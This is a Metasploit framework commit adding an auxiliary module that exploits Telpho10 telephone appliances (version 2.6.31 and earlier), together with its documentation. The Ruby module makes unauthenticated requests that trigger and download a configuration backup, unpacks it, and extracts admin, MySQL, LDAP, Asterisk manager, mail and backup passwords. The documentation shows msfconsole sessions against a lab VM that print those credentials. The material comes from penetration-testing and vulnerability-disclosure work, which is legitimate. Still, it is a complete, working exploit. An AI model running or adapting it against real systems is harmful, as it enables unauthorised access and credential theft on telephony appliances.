Land #7484, Add Telpho10 Credentials Dump Exploit
commit
5c12d55c84
|
@ -0,0 +1,132 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
|
||||
|
||||
Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
The following steps will allow you to install and dump the credentials from a Telpho10 instance:
|
||||
|
||||
1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
|
||||
- note that the ISO will default to a German keyboard layout
|
||||
1. configure the Telpho10's IP address
|
||||
- edit /etc/networks/interfaces accordingly
|
||||
1. Start msfconsole
|
||||
1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
|
||||
1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
|
||||
1. Do: ```run```
|
||||
1. You should see a list of the retrieved Telpho10 credentials
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example output when using this against a Telpho10 v2.6.31 VM:
|
||||
|
||||
```
|
||||
$ ./msfconsole
|
||||
|
||||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
||||
|
||||
|
||||
=[ metasploit v4.12.36-dev-16fc6c1 ]
|
||||
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
|
||||
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
|
||||
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
|
||||
|
||||
msf > use auxiliary/admin/http/telpho10_credential_dump
|
||||
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
|
||||
RHOST => 10.0.2.35
|
||||
msf auxiliary(telpho10_credential_dump) > run
|
||||
|
||||
[*] Generating backup
|
||||
[*] Downloading backup
|
||||
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
|
||||
[*] Dumping credentials
|
||||
|
||||
[*] Login (/telpho/login.php)
|
||||
[*] -------------------------
|
||||
[+] Username: admin
|
||||
[+] Password: telpho
|
||||
|
||||
[*] MySQL (/phpmyadmin)
|
||||
[*] -------------------
|
||||
[+] Username: root
|
||||
[+] Password: telpho
|
||||
|
||||
[*] LDAP (/phpldapadmin)
|
||||
[*] --------------------
|
||||
[+] Username: cn=admin,dc=localdomain
|
||||
[+] Password: telpho
|
||||
|
||||
[*] Asterisk MI (port 5038)
|
||||
[*] -----------------------
|
||||
[+] Username: telpho
|
||||
[+] Password: telpho
|
||||
|
||||
[*] Mail configuration
|
||||
[*] ------------------
|
||||
[+] Mailserver:
|
||||
[+] Username:
|
||||
[+] Password:
|
||||
[+] Mail from:
|
||||
|
||||
[*] Online Backup
|
||||
[*] -------------
|
||||
[+] ID:
|
||||
[+] Password:
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(telpho10_credential_dump) >
|
||||
```
|
||||
|
||||
I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
|
||||
|
||||
```
|
||||
msf auxiliary(telpho10_credential_dump) > run
|
||||
|
||||
[*] Generating backup
|
||||
[*] Downloading backup
|
||||
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
|
||||
[*] Dumping credentials
|
||||
|
||||
[*] Login (/telpho/login.php)
|
||||
[*] -------------------------
|
||||
[+] Username: admin
|
||||
[+] Password: s3cr3t
|
||||
|
||||
[*] MySQL (/phpmyadmin)
|
||||
[*] -------------------
|
||||
[+] Username: root
|
||||
[+] Password: telpho
|
||||
|
||||
[*] LDAP (/phpldapadmin)
|
||||
[*] --------------------
|
||||
[+] Username: cn=admin,dc=localdomain
|
||||
[+] Password: ldaps3cr3t
|
||||
|
||||
[*] Asterisk MI (port 5038)
|
||||
[*] -----------------------
|
||||
[+] Username: telpho
|
||||
[+] Password: asterisks3cr3t
|
||||
|
||||
[*] Mail configuration
|
||||
[*] ------------------
|
||||
[+] Mailserver:
|
||||
[+] Username:
|
||||
[+] Password:
|
||||
[+] Mail from:
|
||||
|
||||
[*] Online Backup
|
||||
[*] -------------
|
||||
[+] ID:
|
||||
[+] Password:
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,159 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rubygems/package'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Telpho10 Backup Credentials Dumper',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Telpho10 telephone system
|
||||
appliance. This module generates a configuration backup of Telpho10,
|
||||
downloads the file and dumps the credentials for admin login,
|
||||
phpmyadmin, phpldapadmin, etc.
|
||||
This module has been successfully tested on the appliance.
|
||||
},
|
||||
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
['Telpho10 <= 2.6.31', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Sep 2 2016'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Used for unpacking backup files
|
||||
def untar(tarfile)
|
||||
destination = tarfile.split('.tar').first
|
||||
FileUtils.mkdir_p(destination)
|
||||
File.open(tarfile, 'rb') do |file|
|
||||
Gem::Package::TarReader.new(file) do |tar|
|
||||
tar.each do |entry|
|
||||
dest = File.join destination, entry.full_name
|
||||
if entry.file?
|
||||
File.open(dest, 'wb') do |f|
|
||||
f.write(entry.read)
|
||||
end
|
||||
File.chmod(entry.header.mode, dest)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
return destination
|
||||
end
|
||||
|
||||
# search for credentials in backup file
|
||||
def dump_creds(mysql_file)
|
||||
file = File.new(mysql_file, 'r')
|
||||
while (line = file.gets)
|
||||
if line.include? 'adminusername'
|
||||
config = [line]
|
||||
end
|
||||
end
|
||||
file.close
|
||||
|
||||
print_status('Login (/telpho/login.php)')
|
||||
print_status('-------------------------')
|
||||
print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('MySQL (/phpmyadmin)')
|
||||
print_status('-------------------')
|
||||
print_good('Username: root')
|
||||
print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('LDAP (/phpldapadmin)')
|
||||
print_status('--------------------')
|
||||
print_good('Username: cn=admin,dc=localdomain')
|
||||
print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Asterisk MI (port 5038)')
|
||||
print_status('-----------------------')
|
||||
print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Mail configuration')
|
||||
print_status('------------------')
|
||||
print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
|
||||
print_good("Username: #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
|
||||
print_good("Mail from: #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Online Backup')
|
||||
print_status('-------------')
|
||||
print_good("ID: #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
res = send_request_cgi({
|
||||
'uri' => '/telpho/system/backup.php',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 200
|
||||
print_status('Generating backup')
|
||||
sleep(1)
|
||||
else
|
||||
print_error("Could not find vulnerable script. Aborting.")
|
||||
return nil
|
||||
end
|
||||
|
||||
print_status('Downloading backup')
|
||||
res = send_request_cgi({
|
||||
'uri' => '/telpho/temp/telpho10.epb',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 200
|
||||
if res.body.to_s.bytesize == 0
|
||||
print_error('0 bytes returned, file does not exist or is empty.')
|
||||
return nil
|
||||
end
|
||||
|
||||
path = store_loot(
|
||||
'telpho10.backup',
|
||||
'application/x-compressed',
|
||||
datastore['RHOST'],
|
||||
res.body,
|
||||
'backup.tar'
|
||||
)
|
||||
print_good("File saved in: #{path}")
|
||||
|
||||
begin
|
||||
extracted = untar("#{path}")
|
||||
mysql = untar("#{extracted}/mysql.tar")
|
||||
rescue
|
||||
print_error('Could not unpack files.')
|
||||
return nil
|
||||
end
|
||||
begin
|
||||
print_status("Dumping credentials\n")
|
||||
dump_creds("#{mysql}/mysql.epb")
|
||||
rescue
|
||||
print_error('Could not find credential file.')
|
||||
return nil
|
||||
end
|
||||
else
|
||||
print_error('Failed to download backup file.')
|
||||
return nil
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{rhost}:#{rport} - Failed to connect")
|
||||
return nil
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue